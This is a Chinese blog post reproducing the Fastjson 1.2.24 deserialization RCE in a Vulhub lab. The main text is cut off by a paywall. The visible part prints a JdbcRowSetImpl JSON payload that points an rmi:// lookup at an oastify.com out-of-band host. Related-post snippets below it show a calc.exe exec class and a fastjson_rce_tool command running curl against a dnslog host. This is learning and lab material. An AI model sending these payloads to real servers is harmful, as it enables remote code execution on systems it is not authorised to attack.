【漏洞复现】fastjson_1.2.24_unserializer_rce

原创 已于 2023-11-04 18:23:21 修改 · 481 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#漏洞复现

于 2023-11-04 18:22:36 首次发布
本文分析了Fastjson1.2.24中的RCE漏洞,涉及高危级,展示了漏洞触发、检测与利用过程,包括通过基础环境复现和深度利用获取shell。

感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规

文章目录

说明 内容
漏洞编号
漏洞名称 fastjson 1.2.24 反序列化导致任意命令执行漏洞
漏洞评级
影响范围
漏洞描述
修复方案

1.1、漏洞描述

FastJson是Alibaba的一款开源Json解析库,可用于将Java对象转换为其Json表示形式,也可以用于将Json字符串转换为等效的Java对象。近几年来FastJson漏洞层出不穷。RCE漏洞的源头:17年FastJson爆出的1.2.24反序列化漏洞。
关于FastJson1.2.24反序列化漏洞,简单来说,就是FastJson通过parseObject/parse将传入的字符串反序列化为Java对象时由于没有进行合理检查而导致的。

1.2、漏洞等级

高危

1.3、影响版本

1.2.24

1.4、漏洞复现

1、基础环境

Path:Vulhub/fastjson/1.2.24-rce

启动测试环境:

sudo docker-compose up -d

访问http://your-ip:8090/即可看到

在这里插入图片描述

发送测试数据:

{
   
   "name":"hello", "age":20}

在这里插入图片描述

2、漏洞检测

使用BurpSuite扩展插件FastjsonScan进行漏洞检测

在这里插入图片描述

POC:

{
   
   
    "handsome":{
   
   
    "@type":"Lcom.sun.rowset.JdbcRowSetImpl;",
    "dataSourceName":
    "rmi://wvvlunpw9mk6u4suzoi884ibw22sqh.oastify.com/aaa",
    "autoCommit":true
    }
}

使用

最低0.47元/天 解锁文章
fastJson1.2.24漏洞复现
@起风了的博客
05-06 862
背景 fastJson1.2.25版本之前的AutoType 是默认开启的,在1.2.25版本之后就是默认关闭的。 而作怪的就是这个AutoType 恶意类 public class Attack { public Attack() { try { //打开本地计算器 String commands = "calc.exe"; Process pc = Runtime.getRuntime().exec(com
fastjson_1.2.24和Shiro(CVE-2016-4437)漏洞复现
qq_55202378的博客
05-11 1440
如果用户勾选记住密码,那么在请求中会携带cookie,并且将加密信息存放在cookie的rememberMe字段里面,在服务端收到请求对rememberMe值,先base64解码然后AES解密再反序列化,这个加密过程如果我们知道AES加密的密钥,那么我们把用户信息替换成恶意命令,就导致了反序列化RCE漏洞。时,需要进行 base64 编码绕过检测(不编码,执行不了,已经试过了~):勾选记住密码选项后,点击登录,抓包,观察请求包中是否有。注意:这里java版本要用java8。,加一个环境变量,就可以用了~
fastjson-1.2.24漏洞复现
qq_43599126的博客
07-04 1813
看完利用链分析后,我们来总结一下,整体来说就是fastjson是根据@type来进行反序列化类并且没有做任何限制,允许指定@type来反序列化任意类,所以导致了反序列化漏洞
Fastjson 1.2.24反序列化漏洞复现
weixin_60830484的博客
04-17 565
本文将进行一次详细的Fastjson 1.2.24反序列化漏洞复现
Fastjson_1.2.24_unserialize_rce漏洞复现
qq_45953122的博客
09-11 805
关于FastJson1.2.24反序列化漏洞,简单来说,就是FastJson通过parseObject/parse将传入的字符串反序列化为Java对象时由于没有进行合理检查而导致的。
fastjson_rce_tool-master.zip
05-14
本文将深入探讨Fastjson中的远程代码执行(RCE漏洞,并介绍“fastjson_rce_tool-master”这个工具的相关知识。 Fastjson RCE漏洞通常发生在Fastjson解析不安全的JSON字符串时,允许攻击者通过构造特定的输入,...
fastjson_rce_tool:fastjson命令执行自动化利用工具,远程执行代码,JNDI服务利用工具RMILDAP
03-31
fastjson_rce_tool java -jar fastjson_tool.jar Usage: java -cp fastjson_tool.jar fastjson.HRMIServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp fastjson_tool.jar fastjson.HLDAPServer 127.0.0.1 80 ...
fastjson1.2.24反序列化漏洞复现 CVE-2017-18349
m0_62284238的博客
09-10 1944
fastjson反序列化漏洞复现 CVE-2017-18349
【渗透测试漏洞复现fastjson1.2.24漏洞复现详细过程
GX233的博客
04-18 6933
fastjson1.2.24 RCE详细复现
fastjson 1.2.24反序列化漏洞复现
ATpiu的博客
03-21 3885
简介 fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。 在Java 8u102环境下,没有com.sun.jndi.rmi.object.trustURLCodebase的限制,可以使用com.sun.rowset.JdbcRowSetImpl的利用链,借助JNDI注入来执行命令。 环境 靶机:http://192...
fastjson 1.2.24漏洞复现
qq_18831583的博客
01-13 1026
fastjson 1.2.24漏洞复现
fastjson1.2.24反序列化漏洞复现,验证JdbcRowSetImpl
liu649983697的专栏
05-30 1820
fastjson反序列化漏洞复现、实验、验证,远程命令调用、漏洞攻击
CVE与重要漏洞复现Fastjson1.2.24-RCE漏洞复现
最新发布
没有网络安全就没有国家安全
03-17 1718
CVE与重要漏洞复现Fastjson1.2.24-RCE漏洞复现
FastJson1.2.24漏洞复现(详细步骤)
qq_35713681的博客
07-28 670
此测试用的是VM搭的Kali 2023.2
fastjson 1.2.24 rce漏洞复现
wutiangui的博客
11-06 505
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久化了。把编译好的class文件传到外网系统中,并在class文件所在的目录,Python起一个http服务。访问http://192.168.232.131:8090/即可看到JSON格式的输出。
Fastjson 漏洞复现1.2.24-rce
人们并不感谢罗辑
08-22 2118
fastjson是阿里巴巴开源的一个json解析库,能将json对象和json字符串进行序列化和反序列化操作。autotype功能是是漏洞的关键,autotype允许用户通过@type字段来选择具体的类进行反序列化。如果用户没有对反序列化的类进行严格限制,攻击者可以构造恶意的json字符串来触发这个漏洞
fastjson1.2.24 反序列化漏洞复现
RMC131的博客
07-21 1165
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。这里json与java对象之间的转换,便是使用的序列化和反序列化,fastjson的反序列化也就是来自这里。详细介绍:https://www.runoob.com/w3cnote/fastjson-intro.html。
漏洞复现fastjson反序列化漏洞1.2.24/1.2.47
weixin_45556536的博客
11-04 1052
fastjson-反序列化漏洞1.2.24/1.2.47基础知识漏洞原理影响版本复现思路复现Fastjson1.2.24复现Fastjson1.2.45/1.2.47 基础知识 Fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。 反序列化常用的两种利用方式,一种是基于rmi,一种是基于ldap。RMI是一种行为,指的是Java远程方法调用。 漏洞原理 Fas
fastjson1.2.24rce漏洞复现
06-06
fastjson1.2.24rce漏洞是一种Java反序列化漏洞,攻击者可以通过构造恶意的JSON数据包,触发目标服务器上的fastjson库反序列化漏洞,从而实现远程代码执行。该漏洞存在于fastjson 1.2.24及之前版本中,已经被修复。...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

过期的秋刀鱼-

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值